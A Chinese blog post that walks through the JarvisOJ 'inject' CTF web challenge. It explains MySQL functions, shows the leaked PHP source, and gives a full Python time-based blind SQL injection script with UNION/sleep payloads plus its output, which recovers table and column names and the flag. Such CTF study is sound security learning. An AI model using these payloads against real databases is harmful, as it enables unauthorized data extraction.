jarvisoj-web-inject

于 2020-05-06 01:18:25 发布
阅读量242 收藏
点赞数 1
分类专栏: ctf 文章标签: mysql sql 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lb821756107/article/details/105940369
版权

题目描述:

题目入口:http://web.jarvisoj.com:32794/

Hint1: 先找到源码再说吧~~

 

知识点罗列:

1, SQL UNION 操作符合并两个或多个 SELECT 语句的结果。

2,select 执行另一个语句,  select(if xxxxxxx)

3,len() 、 length() 函数返回文本字段中值的长度。

4,在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。

5,group_concat()函数

     1、功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

     2、语法:group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc  ] [separator '分隔符'] )

          说明:通过使用distinct可以排除重复值;如果希望对结果中的值进行排序,可以使用order by子句;separator是一个字符串值,缺省为一个逗号。

6,  IF表达式               IF(expr1,expr2,expr3)

     如果 expr1 是TRUE (expr1 <> 0 and expr1 <> NULL),则 IF()的返回值为expr2; 否则返回值则为 expr3。IF() 的返回值为数字值或字符串值,具体情况视其所在语境而定。

      SELECT IF(sva=1,"男","女") AS s FROM table_name WHERE sva != '';

作为表达式的if也可以用CASE WHEN来实现:

       SELECT CASE sva WHEN 1 THEN '男'   ELSE '女' END AS s FROM table_name WHERE sva != '';

7,substr(string,start,length)

string - 指定的要截取的字符串。start - 必需,规定在字符串的何处开始。正数 - 在字符串的指定位置开始,负数 - 在从字符串结尾的指定位置开始,0 - 在字符串中的第一个字符处开始。length - 可选,指定要截取的字符串长度,缺省时返回字符表达式的值结束前的全部字符。

例如:select substr('abcdefg',3,4) from dual; 

8,desc查看表结构的详细信息

desc table_name;   desc 'xxxx' 'yyyyy'   此时 数据库只判断第一个 后面的予以忽略。这是接此题的关键。

9,select 'flag{xxx}' from secret_flag' ' union select 1;  此处的 ' ' 被忽略了。

 

解题过程:

扫描发现连接  http://web.jarvisoj.com:32794/index.php~

<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
?>

 

 

解题代码:

import requests

s = requests.Session()
url = "http://web.jarvisoj.com:32794/index.php?table=test` `"


#get

def timeout_guess_length_get(payload):
        for i in xrange(1,1127):
                #print payload.format(str(i))
                r = requests.get(url=url+payload.format(str(i)))
                if r.elapsed.total_seconds() > 5:
                        #print "length is" + str(i);
                        return i
                #else:
                        #print payload
                        #print r.elapsed.total_seconds()
        return 0
def timeout_guess_context_get(payload,len):
        ret = ""
        for i in range(1,len+1):
                for j in  'abcdefghijklmnopqrstuvwxyz1234567890-=!@#$%^&*()_+[];\',./{}:"<>?\\|~':
                        #print payload.format(str(i), hex(ord(str(j))))
                        r = requests.get(url=url+payload.format(str(i), hex(ord(str(j)))))
                        #print r.text
                        if r.elapsed.total_seconds() > 5:
                                ret += str(j)
                                print ret
                                break
                        #else:
                                #print  payload.format(str(i),str(j))
                                #print r.elapsed.total_seconds()
        return ret


if __name__ == '__main__':
        #database name len
        payload1 = "union select (if(length((select database()))={0},sleep(5),0)) #"
        database_name_len = timeout_guess_length_get(payload1)
        print "database name len = " + str(database_name_len)


        #database name
        payload2 = "union select (if((substr((select database()),{0},1)={1}),sleep(5),0))#"
        database_name = timeout_guess_context_get(payload2,database_name_len)
        print "database name = " + database_name


        #table name len
        payload3 = "union select (if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))={0},sleep(5),0)) #"
        table_name_len = timeout_guess_length_get(payload3)
        print "table name len = " + str(table_name_len)

        #table name
        payload4 = "union select (if((substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)={1}),sleep(5),0))#"
        table_name = timeout_guess_context_get(payload4,table_name_len)
        print "table name = " + table_name


        #column name len
        payload5 = "union select (if(length((select  group_concat(column_name) from information_schema.columns where table_name=0x7365637265745f666c6167))={0},sleep(5),0)) #"
        column_name_len = timeout_guess_length_get(payload5)
        print "column name len = " + str(column_name_len)


        #column name
        payload6 = "union select (if((substr((select group_concat(column_name) from information_schema.columns where table_name=0x7365637265745f666c6167),{0},1)={1}),sleep(5),0))#"
        column_name = timeout_guess_context_get(payload6,column_name_len)
        print "column name = " + column_name


        #flag len
        payload7 = "union select (if(length((select  group_concat(flaguwillneverknow) from secret_flag))={0},sleep(5),0)) #"
        flag_len = timeout_guess_length_get(payload7)
        print "flag len = " + str(flag_len)


        #flag
        payload8 = "union select (if((substr((select group_concat(flaguwillneverknow) from secret_flag),{0},1)={1}),sleep(5),0))#"
        flag = timeout_guess_context_get(payload8,flag_len)
        print "flag = " + flag

 

运行结果:

[root@localhost jarvisoj]# python inject.py 
database name len = 6
6
61
61d
61d3
61d30
61d300
database name = 61d300
table name len = 23
s
se
sec
secr
secre
secret
secret_
secret_f
secret_fl
secret_fla
secret_flag
secret_flag,
secret_flag,s
secret_flag,se
secret_flag,sec
secret_flag,secr
secret_flag,secre
secret_flag,secret
secret_flag,secret_
secret_flag,secret_t
secret_flag,secret_te
secret_flag,secret_tes
secret_flag,secret_test
table name = secret_flag,secret_test
column name len = 18
f
fl
fla
flag
flagu
flaguw
flaguwi
flaguwil
flaguwill
flaguwilln
flaguwillne
flaguwillnev
flaguwillneve
flaguwillnever
flaguwillneverk
flaguwillneverkn
flaguwillneverkno
flaguwillneverknow
column name = flaguwillneverknow
flag len = 16
f
fl
fla
flag
flag{
flag{l
flag{lu
flag{luc
flag{luck
flag{lucky
flag{luckyg
flag{luckyga
flag{luckygam
flag{luckygame
flag{luckygame~
flag{luckygame~}
flag = flag{luckygame~}

 

134678098
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sisu-inject-bean-1.4.2.jar
01-08
sisu-inject-bean-1.4.2.jar
JarvisOJ web题目 [61dctf]inject 解题思路----mysql反引号与单引号的区别
__Curtain_
04-12 2399
原题:http://web.jarvisoj.com:32794/    给了一条提示先找到源码,几种常见的源码泄露方式都试一边。最后在提交 http://web.jarvisoj.com:32794/index.php~ 发现源码。 &lt;?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $ta...
jarvis oj Web By Assassin
Assassin
08-22 8636
LOCALHOST套路题,构造headers中加上x-forwarded-for=127.0.0.1即可 PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}PORT51访问了页面发现让你Please use port 51 to visit this site.明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–l
jarvisoj-web-wp
Iambangbang的博客
08-21 3543
Port51 这是一道pctf的原题,,显然要用公网ip端口进行访问,这时候用到了curl命令,使用curl –local-port http://web.jarvisoj.com:32770/就可以得到flag,但是貌似服务器出了点儿问题,所以不弹flag了 LOCALHOST ,这个题目和上面一道题目差不多,都很基础,用火狐的代理,直接就可以了, Login ,一开始进去没什么思
desc巧用及反引号 ` SQL注入——【61dctf】 inject writeup
Ve99tr’s Blog
09-02 1853
题目链接 :http://web.jarvisoj.com:32794/ 描述 进入页面,发现只有 flag{xxx} 题目hint:先找到源码~ 源码泄露 使用后台目录扫描工具御剑进行后台扫描 源码泄露: http://web.jarvisoj.com:32794/index.php~ F12查看器得到泄露的源码 <?php require("config.php"); $ta...
Jarvis OJ web writeup
stepone4ward的博客
04-03 800
1.Login 在响应头中得到了hint 也就是说我们post传入的pass经过了md5加密,我们都知道这种登陆问题最常见的payload就是类似于admin'or 1=1#这种,同理我们只要能找到一个md5加密后符合这种类似格式的语句即可,在实验吧当中也有一道相似的题目,最后的payload为ffifdyop,这个字符串经过md5加密后的结果为 符合上文提到的格式要求,提交后得到flag。 ...
javax-inject-1.0-201002241208.jar.zip
07-01
《Java注射框架——javax.inject详解》 在Java开发中,依赖注入(Dependency Injection,简称DI)是一种设计模式,它能够使代码更加灵活、可测试和易于维护。javax.inject是Java平台上的一个标准注入API,它是JSR ...
sisu-inject-plexus-1.4.2.jar
01-08
sisu-inject-plexus-1.4.2.jar
JNDI-Inject-Exploit
最新发布
11-04
# JNDI-Inject-Exploit ## 免责声明 本工具仅面向**合法授权的企业安全测试**,如您需测试本工具的可用性请自行搭建靶机环境,在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
jarvis OJ WEB题目writeup
weixin_30596735的博客
03-22 746
0x00前言 发现一个很好的ctf平台,题目感觉很有趣,学习了一波并记录一下 https://www.jarvisoj.com 0x01 Port51 题目要求是用51端口去访问该网页,注意下,要用具有公网的计算机去连,我这里用的我的腾讯云服务器去访问的,本地并不能反回正确结果,因为本地私有地址从代理服务器出去后,使用的是代理服务器的端口,这个端口往往不会是51 curl --...
Jarvis OJ /inject
沐目的博客
10-15 272
Jarvis OJ /inject 感觉SQL注入挺重要的,也算是比较基础的东西,而且经常写题会遇到。所以就打算每次遇到一些新的东西,或者忘了的东西,就记录一下。也会记录一些数据库的知识,毕竟SQL注入和数据库是分不开的。 一.MySQL数据排序asc、desc 1.asc 这个就是把查询到的数据,从小到大的排列,当然,这也是默认的排解方式。像这个是没有加任何其他东西的查找。 mysql&gt...
jarvisoj Inject & PHPINFO
river
03-26 499
Jarvisoj Inject 扫描后台得到index.php~ <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $table = Filter($table); mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker(); $sq...
[Jarvis OJ]–api调用–XXE漏洞学习笔记
超人学飞的日子
07-04 2834
题目地址:http://web.jarvisoj.com:9882/ 查看网页源码: 可以看到我们点击go后,以json的形式发送了数据。抓包: 我们看到,其实我们输入的内容并没有发送到服务器,而是发送了几个特定的值。 这题的提示是查看flag文件,用到的是XXE漏洞,有几篇原理文章参考一下: https://security.tencent.com/index.php...
Jarvis OJ writeup Web
quedgee
10-27 841
参考了http://www.joychou.org/web/SQL-injection-with-raw-MD5-hashes.html抓包,发现了hint sql="SELECT∗FROMadminWHEREpass=′".md5(sql = "SELECT * FROM admin WHERE pass = '".md5(password,true).”’”;思路比较明确,当md5后的hex转
Jarvis OJ inject(反引号注入)
wywwzjj
02-22 826
http://web.jarvisoj.com:32794/index.php~ 得到源码 &amp;amp;amp;amp;amp;lt;?php require(&amp;amp;amp;amp;quot;config.php&amp;amp;amp;amp;quot;); $table = $_GET['table']?$_GET['table']:&amp;amp;amp;amp;quot;test&amp;amp;amp;amp;quot;;
XSSgame writeup
a370793934的专栏
11-26 393
Level1 看源码有name传参,地址栏构造?name=<script>alert(1)</script> 或者?name=<svg/onload=alert(1)> Level2 分析代码,仍然是使用get方法,从url中接受一个keyword参数,不过这里用到一个过滤函数htmlspecialchars()这个函数把预定义的字符转换为 HTM...
jarvis oj Web By Assassin
qq_43679818的博客
01-10 1009
jarvis oj Web By Assassin
tap-inject
10-28
tap-inject是一种VPP插件,它允许将数据包注入到VPP的数据平面中。它可以用于测试和调试,也可以用于构建虚拟网络功能。通过tap-inject,用户可以将数据包注入到VPP的数据平面中,然后在VPP中进行处理,最终将数据包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值